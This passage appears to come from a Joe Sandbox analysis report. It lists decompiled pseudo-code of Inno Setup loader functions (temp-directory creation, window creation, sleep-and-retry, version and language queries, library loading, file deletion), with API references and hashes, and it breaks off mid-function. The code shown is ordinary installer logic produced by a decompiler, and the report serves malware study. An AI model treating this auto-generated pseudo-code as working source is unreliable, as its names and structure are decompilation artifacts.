                                                                                                                            • Instruction ID: 4c04e7183c3d5c6504f231a905193e891933426fc174ea8e71756e1f90614aff
                                                                                                                            • Opcode Fuzzy Hash: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
                                                                                                                            • Instruction Fuzzy Hash: 46111CB04047449FE311BF76A8062267BA8EB05309B508A7FE110662E2EBFD15048FEE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AEFE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 73%
                                                                                                                            			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}


















                                                                                                                            0x004aefe8
                                                                                                                            0x004aefe8
                                                                                                                            0x004aefe9
                                                                                                                            0x004aefeb
                                                                                                                            0x004aeff0
                                                                                                                            0x004aeff0
                                                                                                                            0x004aeff2
                                                                                                                            0x004aeff4
                                                                                                                            0x004aeff4
                                                                                                                            0x004aeff7
                                                                                                                            0x004aeff8
                                                                                                                            0x004aeffa
                                                                                                                            0x004aeffc
                                                                                                                            0x004aeffe
                                                                                                                            0x004aefff
                                                                                                                            0x004af004
                                                                                                                            0x004af007
                                                                                                                            0x004af00a
                                                                                                                            0x004af011
                                                                                                                            0x004af019
                                                                                                                            0x004af020
                                                                                                                            0x004af030
                                                                                                                            0x004af037
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004af03e
                                                                                                                            0x004af040
                                                                                                                            0x004af046
                                                                                                                            0x004af056
                                                                                                                            0x004af05e
                                                                                                                            0x004af06a
                                                                                                                            0x004af072
                                                                                                                            0x004af07a
                                                                                                                            0x004af082
                                                                                                                            0x004af091
                                                                                                                            0x004af096
                                                                                                                            0x004af0a0
                                                                                                                            0x004af0a5
                                                                                                                            0x004af0a5
                                                                                                                            0x004af046
                                                                                                                            0x004af0b4
                                                                                                                            0x004af0b9
                                                                                                                            0x004af0bb
                                                                                                                            0x004af0be
                                                                                                                            0x004af0c1
                                                                                                                            0x004af0ce
                                                                                                                            0x004af0e0

                                                                                                                            APIs
                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                            • String ID: .tmp
                                                                                                                            • API String ID: 1375471231-2986845003
                                                                                                                            • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                                                            • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                                                                                            • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                                                                                            • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E450 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 551 40e450-40e4a4 call 405740 CreateWindowExW call 405730
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}








                                                                                                                            0x0040e457
                                                                                                                            0x0040e45c
                                                                                                                            0x0040e45e
                                                                                                                            0x0040e48f
                                                                                                                            0x0040e498
                                                                                                                            0x0040e4a4

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateWindow
                                                                                                                            • String ID: InnoSetupLdrWindow$STATIC
                                                                                                                            • API String ID: 716092398-2209255943
                                                                                                                            • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                                                            • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                                                                                            • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                                                                                            • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF1B4 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 556 4af1b4-4af1c5 557 4af20e-4af213 556->557 558 4af1c7-4af1c8 556->558 559 4af1ca-4af1cd 558->559 560 4af1da-4af1dd 559->560 561 4af1cf-4af1d8 Sleep 559->561 562 4af1e8-4af1ed call 427154 560->562 563 4af1df-4af1e3 Sleep 560->563 561->562 565 4af1f2-4af1f4 562->565 563->562 565->557 566 4af1f6-4af1fe GetLastError 565->566 566->557 567 4af200-4af208 GetLastError 566->567 567->557 568 4af20a-4af20c 567->568 568->557 568->559
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}










                                                                                                                            0x004af1b4
                                                                                                                            0x004af1bb
                                                                                                                            0x004af1be
                                                                                                                            0x004af1c2
                                                                                                                            0x004af1c5
                                                                                                                            0x004af213
                                                                                                                            0x004af213
                                                                                                                            0x004af213
                                                                                                                            0x004af1c7
                                                                                                                            0x004af1c8
                                                                                                                            0x004af1ca
                                                                                                                            0x004af1ca
                                                                                                                            0x004af1cd
                                                                                                                            0x004af1da
                                                                                                                            0x004af1dd
                                                                                                                            0x004af1e3
                                                                                                                            0x004af1e3
                                                                                                                            0x004af1cf
                                                                                                                            0x004af1d3
                                                                                                                            0x004af1d3
                                                                                                                            0x004af1ed
                                                                                                                            0x004af1f4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004af1f6
                                                                                                                            0x004af1fe
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004af200
                                                                                                                            0x004af208
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004af20a
                                                                                                                            0x004af20b
                                                                                                                            0x004af20c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004af20c
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1458359878-0
                                                                                                                            • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                                                            • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                                                                                            • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                                                                                            • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041FF94 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 63%
                                                                                                                            			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}



















                                                                                                                            0x0041ff95
                                                                                                                            0x0041ff97
                                                                                                                            0x0041ff9f
                                                                                                                            0x0041ffa2
                                                                                                                            0x0041ffa4
                                                                                                                            0x0041ffaa
                                                                                                                            0x0041ffab
                                                                                                                            0x0041ffb0
                                                                                                                            0x0041ffb3
                                                                                                                            0x0041ffb6
                                                                                                                            0x0041ffbf
                                                                                                                            0x0041ffc7
                                                                                                                            0x0041ffd9
                                                                                                                            0x0041ffde
                                                                                                                            0x0041ffe2
                                                                                                                            0x00420080
                                                                                                                            0x00420083
                                                                                                                            0x00420086
                                                                                                                            0x00420093
                                                                                                                            0x0041ffe8
                                                                                                                            0x0041ffef
                                                                                                                            0x0041fff4
                                                                                                                            0x0041fff5
                                                                                                                            0x0041fffa
                                                                                                                            0x0041fffd
                                                                                                                            0x00420012
                                                                                                                            0x00420019
                                                                                                                            0x00420041
                                                                                                                            0x0042004a
                                                                                                                            0x0042005b
                                                                                                                            0x0042005d
                                                                                                                            0x0042005d
                                                                                                                            0x00420063
                                                                                                                            0x00420066
                                                                                                                            0x00420069
                                                                                                                            0x00420076
                                                                                                                            0x00420076

                                                                                                                            APIs
                                                                                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                                                                                            • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                                                                                            • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileInfoVersion$QuerySizeValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2179348866-0
                                                                                                                            • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                                                            • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                                                                                            • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                                                                            • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B110 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                                                                                            0x0040b110
                                                                                                                            0x0040b110
                                                                                                                            0x0040b113
                                                                                                                            0x0040b115
                                                                                                                            0x0040b117
                                                                                                                            0x0040b119
                                                                                                                            0x0040b11b
                                                                                                                            0x0040b11d
                                                                                                                            0x0040b11f
                                                                                                                            0x0040b120
                                                                                                                            0x0040b121
                                                                                                                            0x0040b123
                                                                                                                            0x0040b126
                                                                                                                            0x0040b12c
                                                                                                                            0x0040b134
                                                                                                                            0x0040b13b
                                                                                                                            0x0040b13c
                                                                                                                            0x0040b141
                                                                                                                            0x0040b144
                                                                                                                            0x0040b149
                                                                                                                            0x0040b152
                                                                                                                            0x0040b20c
                                                                                                                            0x0040b20e
                                                                                                                            0x0040b211
                                                                                                                            0x0040b214
                                                                                                                            0x0040b226
                                                                                                                            0x0040b226
                                                                                                                            0x0040b15e
                                                                                                                            0x0040b163
                                                                                                                            0x0040b168
                                                                                                                            0x0040b16d
                                                                                                                            0x0040b16d
                                                                                                                            0x0040b16f
                                                                                                                            0x0040b174
                                                                                                                            0x0040b19b
                                                                                                                            0x0040b1a1
                                                                                                                            0x0040b1aa
                                                                                                                            0x0040b1bb
                                                                                                                            0x0040b1c3
                                                                                                                            0x0040b1d0
                                                                                                                            0x0040b1d5
                                                                                                                            0x0040b1d8
                                                                                                                            0x0040b1da
                                                                                                                            0x0040b1e1
                                                                                                                            0x0040b1e3
                                                                                                                            0x0040b1eb
                                                                                                                            0x0040b1f8
                                                                                                                            0x0040b1f8
                                                                                                                            0x0040b1e1
                                                                                                                            0x0040b1fd
                                                                                                                            0x0040b200
                                                                                                                            0x0040b207
                                                                                                                            0x0040b207
                                                                                                                            0x0040b1ac
                                                                                                                            0x0040b1b4
                                                                                                                            0x0040b1b4
                                                                                                                            0x00000000
                                                                                                                            0x0040b1aa
                                                                                                                            0x0040b176
                                                                                                                            0x0040b196
                                                                                                                            0x0040b197
                                                                                                                            0x0040b199
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040b199
                                                                                                                            0x0040b185
                                                                                                                            0x0040b18f
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                                                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DefaultLanguage$SystemUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 384301227-0
                                                                                                                            • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                                                            • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                                                                                            • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                                                                            • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B234 Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}











                                                                                                                            0x0040b241
                                                                                                                            0x0040b247
                                                                                                                            0x0040b24d
                                                                                                                            0x0040b250
                                                                                                                            0x0040b254
                                                                                                                            0x0040b255
                                                                                                                            0x0040b25a
                                                                                                                            0x0040b25d
                                                                                                                            0x0040b270
                                                                                                                            0x0040b27d
                                                                                                                            0x0040b288
                                                                                                                            0x0040b29a
                                                                                                                            0x0040b2a8
                                                                                                                            0x0040b2a9
                                                                                                                            0x0040b2b2
                                                                                                                            0x0040b2c1
                                                                                                                            0x0040b2c6
                                                                                                                            0x0040b2ca
                                                                                                                            0x0040b2cd
                                                                                                                            0x0040b2d0
                                                                                                                            0x0040b2e0
                                                                                                                            0x0040b2ed

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileLibraryLoadModuleName
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1159719554-0
                                                                                                                            • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                                                            • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                                                                                            • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                                                                            • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00427154 Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 60%
                                                                                                                            			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
